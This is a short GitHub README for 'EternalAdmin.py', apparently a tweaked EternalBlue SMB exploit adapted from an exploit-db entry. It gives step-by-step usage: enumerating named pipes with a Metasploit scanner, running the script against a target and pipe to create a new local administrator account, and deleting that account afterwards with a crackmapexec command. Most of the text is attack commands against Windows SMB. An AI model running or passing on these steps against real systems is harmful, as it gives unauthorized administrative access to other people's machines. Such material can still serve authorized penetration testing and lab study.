Skip to content

Latest commit

 

History

History
19 lines (15 loc) · 449 Bytes

README.md

File metadata and controls

19 lines (15 loc) · 449 Bytes

Eternal blue exploit tweaked from https://www.exploit-db.com/exploits/42315

  1. Enumerate pipes
msfconsole 
auxiliary/scanner/smb/pipe_auditor
  1. Edit the 4 blank variables at the beginning of the exploit code

  2. Run to a add new local admin account

python2.7 ./EternalAdmin.py [target] [pipe]
  1. Remove created local admin once finished
crackmapexec smb 192.168.4.29  -u 'z'  -p 'x' --local-auth -x "net user /delete z"